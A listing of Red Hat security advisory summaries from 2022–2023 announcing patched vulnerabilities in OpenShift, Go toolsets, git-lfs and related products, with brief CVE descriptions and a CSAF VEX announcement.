An update for cockpit-composer, osbuild, osbuild-composer, and weldr-client is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-2879: A flaw was found in the golang package, where Reader.Read does not set a limit on the maximum size of file headers. After fixing, Reader.Read limits the maximum size of header blocks to 1 MiB. This flaw allows a maliciously crafted archive to cause Read to allocate unbounded amounts of memory, ...

RHSA-2023:2866: Red Hat Security Advisory: git-lfs security and bug fix update

An update for git-lfs is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-2880: A flaw was found in the golang package, where requests forwarded by reverse proxy include the raw query parameters from the inbound request, including unparseable parameters rejected by net/http. This issue could permit query parameter smuggling when a Go proxy forwards a parameter with an unparseable value. After the fix, the reverse proxy saniti...

Red Hat Security Advisory 2023-2177-01

Red Hat Security Advisory 2023-2177-01 - The Grafana plugin for Performance Co-Pilot includes datasources for scalable time series from pmseries and Redis, live PCP metrics and bpftrace scripts from pmdabpftrace, as well as several dashboards.

RHSA-2023:2177: Red Hat Security Advisory: grafana-pcp security and enhancement update

An update for grafana-pcp is now available for Red Hat Enterprise Linux 9. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-27664: A flaw was found in the golang package. In net/http in Go, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if a fatal error preempts the shutdown.

RHSA-2023:2357: Red Hat Security Advisory: git-lfs security and bug fix update

An update for git-lfs is now available for Red Hat Enterprise Linux 9. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-1705: A flaw was found in golang. The HTTP/1 client accepted invalid Transfer-Encoding headers indicating "chunked" encoding. This issue could allow request smuggling, but only if combined with an intermediate server that also improperly accepts the header as invalid. * CVE-2022-2880: A flaw was found in the golang package, where requests forwarded by r...

Red Hat Security Advisory 2023-2041-01

Red Hat Security Advisory 2023-2041-01 - Migration Toolkit for Applications 6.1.0 Images. Issues addressed include denial of service, privilege escalation, server-side request forgery, and traversal vulnerabilities.

RHSA-2023:2041: Red Hat Security Advisory: Migration Toolkit for Applications security and bug fix update

Migration Toolkit for Applications 6.1.0 release Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-3782: A flaw was found in Keycloak, where it does not properly validate URLs included in a redirect. An attacker can use this flaw to construct a malicious request to bypass validation and access other URLs and potentially sensitive information within the domain or possibly conduct further attacks. This flaw affects any client that utilizes a wildcard in the Valid Redirect ...

Red Hat Security Advisory 2023-1656-01

Red Hat Security Advisory 2023-1656-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.10.56.

Red Hat Security Advisory 2023-1655-01

Red Hat Security Advisory 2023-1655-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.10.56. Issues addressed include bypass, cross site scripting, information leakage, insecure permissions, and privilege escalation vulnerabilities.

RHSA-2023:1655: Red Hat Security Advisory: OpenShift Container Platform 4.10.56 security update

Red Hat OpenShift Container Platform release 4.10.56 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.10. Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-3172: A security issue was discovered in kube-apiserver that allows an aggregated API server to redirect client traffic to any URL. This issue leads to the client performing unexpected acti...

CVE-2023-1802: Docker Desktop release notes

In Docker Desktop 4.17.x the Artifactory Integration falls back to sending registry credentials over plain HTTP if the HTTPS health check has failed. A targeted network sniffing attack can lead to a disclosure of sensitive information. Only users who have Access Experimental Features enabled and have logged in to a private registry are affected.

Red Hat Security Advisory 2023-1448-01

Red Hat Security Advisory 2023-1448-01 - Red Hat OpenShift Service Mesh is the Red Hat distribution of the Istio service mesh project, tailored for installation into an on-premise OpenShift Container Platform installation. This advisory covers container images for the release.

RHSA-2023:1428: Red Hat Security Advisory: Migration Toolkit for Containers (MTC) 1.7.8 security and bug fix update

The Migration Toolkit for Containers (MTC) 1.7.8 is now available. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2020-36567: A flaw was found in gin. This issue occurs when the default Formatter for the Logger middleware (LoggerConfig.Formatter), which is included in the Default engine, allows attackers to inject arbitrary log entries by manipulating the request path. * CVE-2022-24999: A flaw was found in the express.js npm package. Express.js Express is vulnerable to a d...

Red Hat Security Advisory 2023-1286-01

Red Hat Security Advisory 2023-1286-01 - Migration Toolkit for Runtimes 1.0.2 Images. Issues addressed include denial of service, privilege escalation, and server-side request forgery vulnerabilities.

Red Hat Security Advisory 2023-1275-01

Red Hat Security Advisory 2023-1275-01 - An update for etcd is now available for Red Hat OpenStack Platform. Issues addressed include a denial of service vulnerability.

RHSA-2023:1275: Red Hat Security Advisory: Red Hat OpenStack Platform (etcd) security update

An update for etcd is now available for Red Hat OpenStack Platform. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-1705: A flaw was found in golang. The HTTP/1 client accepted invalid Transfer-Encoding headers indicating "chunked" encoding. This issue could allow request smuggling, but only if combined with an intermediate server that also improperly accepts the header as invalid. * CVE-2022-2880: A flaw was found in the golang package, where requests forwarded by rev...

Red Hat Security Advisory 2023-1174-01

Red Hat Security Advisory 2023-1174-01 - OpenShift API for Data Protection (OADP) 1.1.2 is now available. Red Hat Product Security has rated this update as having a security impact of Moderate.

Red Hat Security Advisory 2023-1079-01

Red Hat Security Advisory 2023-1079-01 - An update for osp-director-downloader-container, osp-director-agent-container and osp-director-operator-container is now available for Red Hat OpenStack Platform 16.2 (Train).

RHSA-2023:1042: Red Hat Security Advisory: Custom Metrics Autoscaler Operator for Red Hat OpenShift (with security updates)

Custom Metrics Autoscaler Operator for Red Hat OpenShift including security updates. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-1705: A flaw was found in golang. The HTTP/1 client accepted invalid Transfer-Encoding headers indicating "chunked" encoding. This issue could allow request smuggling, but only if combined with an intermediate server that also improperly accepts the header as invalid. * CVE-2022-1962: A flaw was found in the golang standard library, go/par...

CVE-2022-3162: CVE-2022-3162: Unauthorized read of Custom Resources · Issue #113756 · kubernetes/kubernetes

Users authorized to list or watch one type of namespaced custom resource cluster-wide can read custom resources of a different type in the same API group without authorization. Clusters are impacted by this vulnerability if all of the following are true: 1. There are 2+ CustomResourceDefinitions sharing the same API group 2. Users have cluster-wide list or watch authorization on one of those custom resources. 3. The same users are not authorized to read another custom resource in the same API group.

RHSA-2023:0890: Red Hat Security Advisory: OpenShift Container Platform 4.12.5 security update

Red Hat OpenShift Container Platform release 4.12.5 is now available with updates to packages and images that fix several bugs and add enhancements. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-38561: A flaw was found in golang. The language package for go language can panic due to an out-of-bounds read when an incorrectly formatted language tag is being parsed. This flaw allows an attacker to cause applications using this package to parse untrusted input data to cra...

Red Hat Security Advisory 2023-0918-01

Red Hat Security Advisory 2023-0918-01 - Service Binding manages the data plane for applications and backing services.

RHSA-2023:0774: Red Hat Security Advisory: OpenShift Container Platform 4.11.28 security update

Red Hat OpenShift Container Platform release 4.11.28 is now available with updates to packages and images that fix several bugs and add enhancements. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-4238: A flaw was found in goutils where randomly generated alphanumeric strings contain significantly less entropy than expected. Both the `RandomAlphaNumeric` and `CryptoRandomAlphaNumeric` functions always return strings containing at least one digit from 0 to 9. This issu...

Red Hat Security Advisory 2023-0772-01

Red Hat Security Advisory 2023-0772-01 - Red Hat build of MicroShift is Red Hat's light-weight Kubernetes orchestration solution designed for edge device deployments and is built from the edge capabilities of Red Hat OpenShift. MicroShift is an application that is deployed on top of Red Hat Enterprise Linux devices at the edge, providing an efficient way to operate single-node clusters in these low-resource environments. This advisory contains the RPM packages for Red Hat build of MicroShift 4.12.4.

RHSA-2023:0772: Red Hat Security Advisory: OpenShift Container Platform 4.12.4 security update

Red Hat build of MicroShift release 4.12.4 is now available with updates to packages and images that fix several bugs. This release includes a security update for the Red Hat build of MicroShift 4.12. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-3162: A flaw was found in kubernetes. Users authorized to list or watch one type of namespaced custom resource cluster-wide can read custom resources of a different kind in the same API group they are not authorized to read...

Red Hat Security Advisory 2023-0727-01

Red Hat Security Advisory 2023-0727-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.12.3.

Red Hat Security Advisory 2023-0795-01

Red Hat Security Advisory 2023-0795-01 - Submariner 0.13.3 packages that fix various bugs and add various enhancements that are now available for Red Hat Advanced Cluster Management for Kubernetes version 2.6.

Red Hat Security Advisory 2023-0794-01

Red Hat Security Advisory 2023-0794-01 - Red Hat Advanced Cluster Management for Kubernetes 2.6.4 images Red Hat Advanced Cluster Management for Kubernetes provides the capabilities to address common challenges that administrators and site reliability engineers face as they work across a range of public and private cloud environments. Clusters and applications are all visible and managed from a single console—with security policy built in. This advisory contains the container images for Red Hat Advanced Cluster Management for Kubernetes, which fix several bugs.

RHSA-2023:0794: Red Hat Security Advisory: Red Hat Advanced Cluster Management 2.6.4 bug fixes and security updates

Red Hat Advanced Cluster Management for Kubernetes 2.6.4 General Availability release images, which fix bugs and update container images. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE links in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-24999: qs before 6.10.3, as used in Express before 4.17.3 and other products, allows attackers to cause a Node process hang for an Express application because an __ proto__ key can be used. In many typical Express use cases, an unauthenticated remote attacker can place the attack payload i...

Red Hat Security Advisory 2023-0574-01

Red Hat Security Advisory 2023-0574-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.9.55. Issues addressed include a bypass vulnerability.

RHSA-2023:0574: Red Hat Security Advisory: OpenShift Container Platform 4.9.55 security update

Red Hat OpenShift Container Platform release 4.9.55 is now available with updates to packages and images that fix several bugs and add enhancements. Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-4238: A flaw was found in goutils where randomly generated alphanumeric strings contain significantly less entropy than expected. Both the `RandomAlphaNumeric` and `CryptoRandomAlphaNumeric` functions always return strings containing at least one digit from 0 to 9. This issue ...

Red Hat Security Advisory 2023-0708-01

Red Hat Security Advisory 2023-0708-01 - Red Hat OpenShift Serverless Client kn 1.27.0 provides a CLI to interact with Red Hat OpenShift Serverless 1.27.0. The kn CLI is delivered as an RPM package for installation on RHEL platforms, and as binaries for non-Linux platforms.

Red Hat Security Advisory 2023-0709-01

Red Hat Security Advisory 2023-0709-01 - Version 1.27.0 of the OpenShift Serverless Operator is supported on Red Hat OpenShift Container Platform versions 4.8, 4.9, 4.10, 4.11 and 4.12. This release includes security and bug fixes, and enhancements.

Red Hat Security Advisory 2023-0693-01

Red Hat Security Advisory 2023-0693-01 - The Migration Toolkit for Containers enables you to migrate Kubernetes resources, persistent volume data, and internal container images between OpenShift Container Platform clusters, using the MTC web console or the Kubernetes API. Issues addressed include a denial of service vulnerability.

RHSA-2023:0693: Red Hat Security Advisory: Migration Toolkit for Containers (MTC) 1.7.7 security and bug fix update

The Migration Toolkit for Containers (MTC) 1.7.7 is now available. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-43138: A vulnerability was found in the async package. This flaw allows a malicious user to obtain privileges via the mapValues() method. * CVE-2022-2879: A flaw was found in the golang package, where Reader.Read does not set a limit on the maximum size of file headers. After fixing, Reader.Read limits the maximum size of header blocks to 1 MiB. This flaw a...

Red Hat Security Advisory 2023-0569-01

Red Hat Security Advisory 2023-0569-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.12.2. Issues addressed include a denial of service vulnerability.

Red Hat Security Advisory 2023-0570-01

Red Hat Security Advisory 2023-0570-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.12.2. Issues addressed include a denial of service vulnerability.

RHSA-2023:0569: Red Hat Security Advisory: OpenShift Container Platform 4.12.2 security update

Red Hat OpenShift Container Platform release 4.12.2 is now available with updates to packages and images that fix several bugs and add enhancements. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-4235: A flaw was found in go-yaml. This issue occurs due to unbounded alias chasing, where a maliciously crafted YAML file can cause the system to consume significant system resources. If parsing user input, this may be used as a denial of service vector. * CVE-2021-4238: A f...

RHSA-2023:0570: Red Hat Security Advisory: OpenShift Container Platform 4.12.2 security update

Red Hat OpenShift Container Platform release 4.12.2 is now available with updates to packages and images that fix several bugs and add enhancements. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-4235: A flaw was found in go-yaml. This issue occurs due to unbounded alias chasing, where a maliciously crafted YAML file can cause the system to consume significant system resources. If parsing user input, this may be used as a denial of service vector.

RHSA-2023:0630: Red Hat Security Advisory: Red Hat Advanced Cluster Management 2.7.0 security and bug fix updates

Red Hat Advanced Cluster Management for Kubernetes 2.7.0 General Availability release images, which provide security updates and fix bugs. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE links in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-3517: A vulnerability was found in the nodejs-minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service. * CVE-2022-30629: A flaw was found in the crypto/tls golang pa...

CSAF VEX documents now generally available

<p>In June 2022, we started <a href="https://www.redhat.com/en/blog/common-security-advisory-framework-csaf-beta-files-now-available">publishing CSAF advisory files</a> in their beta format, hoping to gather feedback from customers, partners, and the security community. With your inputs we worked on improving the final version of the files and they are now ready for public consumption in production use cases at <a href="https://access.redhat.com/security/data/csaf/v2/advisories/">https://access.redhat.c

Red Hat Security Advisory 2023-0542-01

Red Hat Security Advisory 2023-0542-01 - Red Hat OpenShift Service Mesh is the Red Hat distribution of the Istio service mesh project, tailored for installation into an on-premise OpenShift Container Platform installation. This advisory covers container images for the release. Issues addressed include denial of service and spoofing vulnerabilities.

RHSA-2023:0542: Red Hat Security Advisory: Red Hat OpenShift Service Mesh 2.3.1 Containers security update

Red Hat OpenShift Service Mesh 2.3.1 Containers Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-4238: goutils: RandomAlphaNumeric and CryptoRandomAlphaNumeric are not as random as they should be * CVE-2022-2879: golang: archive/tar: unbounded memory consumption when reading headers * CVE-2022-2880: golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters * CVE-2022-3962: kiali: error message spoofing in kiali UI * CVE-2022-27664: golang: ...

Red Hat Security Advisory 2023-0468-01

Red Hat Security Advisory 2023-0468-01 - Red Hat Openshift GitOps is a declarative way to implement continuous deployment for cloud native applications.

Red Hat Security Advisory 2023-0467-01

Red Hat Security Advisory 2023-0467-01 - Red Hat Openshift GitOps is a declarative way to implement continuous deployment for cloud native applications. Issues addressed include a bypass vulnerability.

RHSA-2023:0470: Red Hat Security Advisory: Migration Toolkit for Runtimes security update

An update is now available for Migration Toolkit for Runtimes (v1.0.1). Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-42920: Apache-Commons-BCEL: arbitrary bytecode produced via out-of-bounds writing

RHSA-2023:0467: Red Hat Security Advisory: Red Hat OpenShift GitOps security update

An update is now available for Red Hat OpenShift GitOps 1.7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2023-22482: ArgoCD: JWT audience claim is not verified * CVE-2023-22736: argocd: Controller reconciles apps outside configured namespaces when sharding is enabled

Red Hat Security Advisory 2023-0446-01

Red Hat Security Advisory 2023-0446-01 - Go Toolset provides the Go programming language tools and libraries. Go is alternatively known as golang.

Red Hat Security Advisory 2023-0445-01

Red Hat Security Advisory 2023-0445-01 - Go Toolset provides the Go programming language tools and libraries. Go is alternatively known as golang.

RHSA-2023:0446: Red Hat Security Advisory: go-toolset:rhel8 security and bug fix update

An update for the go-toolset:rhel8 module is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-2879: golang: archive/tar: unbounded memory consumption when reading headers * CVE-2022-2880: golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters * CVE-2022-41715: golang: regexp/syntax: limit memory used by parsing regexps

RHSA-2023:0445: Red Hat Security Advisory: go-toolset-1.18 security update

An update for go-toolset-1.18 and go-toolset-1.18-golang is now available for Red Hat Developer Tools. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-2879: golang: archive/tar: unbounded memory consumption when reading headers * CVE-2022-2880: golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters * CVE-2022-41715: golang: regexp/syntax: limit memory used by parsing regexps

Red Hat Security Advisory 2023-0241-01

Red Hat Security Advisory 2023-0241-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.10.50.

RHSA-2023:0241: Red Hat Security Advisory: OpenShift Container Platform 4.10.50 bug and security update

Red Hat OpenShift Container Platform release 4.10.50 is now available with updates to packages and images that fix several bugs. Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2023-0296: openshift: etcd grpc-proxy vulnerable to The Birthday attack against 64-bit block cipher

RHSA-2023:0328: Red Hat Security Advisory: go-toolset and golang security and bug fix update

An update for go-toolset and golang is now available for Red Hat Enterprise Linux 9. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-2879: golang: archive/tar: unbounded memory consumption when reading headers * CVE-2022-2880: golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters * CVE-2022-41715: golang: regexp/syntax: limit memory used by parsing regexps

Red Hat Security Advisory 2023-0069-01

Red Hat Security Advisory 2023-0069-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.11.24.

Red Hat Security Advisory 2023-0264-01

Red Hat Security Advisory 2023-0264-01 - An update for Logging Subsystem (5.6.0) is now available for Red Hat OpenShift Container Platform. Issues addressed include a denial of service vulnerability.

RHSA-2023:0069: Red Hat Security Advisory: OpenShift Container Platform 4.11.24 bug and security update

Red Hat OpenShift Container Platform release 4.11.24 is now available with updates to packages and images that fix several bugs. Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2023-0296: openshift: etcd grpc-proxy vulnerable to The Birthday attack against 64-bit block cipher

RHSA-2023:0264: Red Hat Security Advisory: Red Hat OpenShift (Logging Subsystem) security update

An update for Logging Subsystem (5.6.0) is now available for Red Hat OpenShift Container Platform. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2020-36518: jackson-databind: denial of service via a large depth of nested objects * CVE-2022-2879: golang: archive/tar: unbounded memory consumption when reading headers * CVE-2022-2880: golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters * CVE-2022-27664: golang: net/http: handle server error...

Red Hat Security Advisory 2022-7398-02

Red Hat Security Advisory 2022-7398-02 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.12.0. Issues addressed include a denial of service vulnerability.

CVE-2023-0296: Invalid Bug ID

The Birthday attack against 64-bit block ciphers flaw (CVE-2016-2183) was reported for the health checks port (9979) on etcd grpc-proxy component. Even though the CVE-2016-2183 has been fixed in the etcd components, to enable periodic health checks from kubelet, it was necessary to open up a new port (9979) on etcd grpc-proxy, hence this port might be considered as still vulnerable to the same type of vulnerability. The health checks on etcd grpc-proxy do not contain sensitive data (only metrics data), therefore the potential impact related to this vulnerability is minimal. The CVE-2023-0296 has been assigned to this issue to track the permanent fix in the etcd component.

RHSA-2022:7399: Red Hat Security Advisory: OpenShift Container Platform 4.12.0 bug fix and security update

Red Hat OpenShift Container Platform release 4.12.0 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.12. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-38561: golang: out-of-bounds read in golang.org/x/text/language leads to DoS * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-2879: golang: arc...

RHSA-2022:7399: Red Hat Security Advisory: OpenShift Container Platform 4.12.0 bug fix and security update

Red Hat OpenShift Container Platform release 4.12.0 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.12. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-38561: golang: out-of-bounds read in golang.org/x/text/language leads to DoS * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-2879: golang: arc...

